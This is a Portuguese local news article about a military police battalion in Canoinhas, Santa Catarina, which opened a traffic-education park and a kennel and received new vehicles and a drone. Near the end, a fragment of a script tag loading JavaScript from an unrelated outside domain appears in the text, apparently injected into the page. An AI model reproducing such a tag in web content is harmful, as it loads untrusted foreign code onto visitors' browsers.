InícioDestaqueInauguração da Transitolândia, do Canil Setorial e entregas de viaturas no 3º...

Inauguração da Transitolândia, do Canil Setorial e entregas de viaturas no 3º Batalhão de Polícia Militar

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

O evento contou com a presença de diversas autoridades, entre eles o Secretário de Estado da Segurança Publica Alceu de Oliveira Pinto Júnior, o secretário executivo da Agência de Desenvolvimento Regional de Mafra, Abel Schoroeder, o comandante-geral da Polícia Militar de Santa Catarina, coronel Carlos Alberto de Araújo Gomes Júnior, o comandante da 2ª Região da Polícia Militar (RPM), coronel Moacir Gomes Ribeiro, além de outras autoridades civis, militares e demais convidados.

 

Com o objetivo de educar cidadãos multiplicadores, a partir de atividades de conscientização no transito que foi edificada a transitolândia. A placa inaugural recebeu o nome do soldado Pablo Tobias Friedrich, policial militar que serviu com honra e bravura a este Batalhão, mas que fatalmente faleceu em um acidente de trânsito.

 

Na ocasião, foram entregues ao 3º BPM, com recursos do Poder Judiciário, um drone, duas viaturas Renault Duster e duas motocicletas Honda XRE-300 totalmente equipadas. Também foram entregues duas motocicletas Honda XRE-300 adquiridas com recursos advindos do Poder Executivo do município de Canoinhas. Esses equipamentos serão utilizados na circunscrição desta unidade policial militar em ações de policiamento preventivo e ostensivo, para propiciar ao cidadão o atendimento adequado às suas necessidades nos momentos em que ele mais precisa da presença do estado.

 

Continuando a solenidade, foi inaugurado o Canil Setorial, com uma área construída de aproximadamente 100m², mais 100m² de área verde/adestramento. Dispõe de três cães policiais em fase de adestramento, sendo dois da raça pastor belga de malinóes, adquiridos mediante parceria com o poder judiciário e 01 pastor alemão cedido pelo soldado Niaro Hatschbach Freitas (integrante do canil setorial).

 

Finalizando, o Comando da Polícia Militar agradeceu as autoridades civis e militares, imprensa e demais convidados que prestigiaram esta solenidade.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.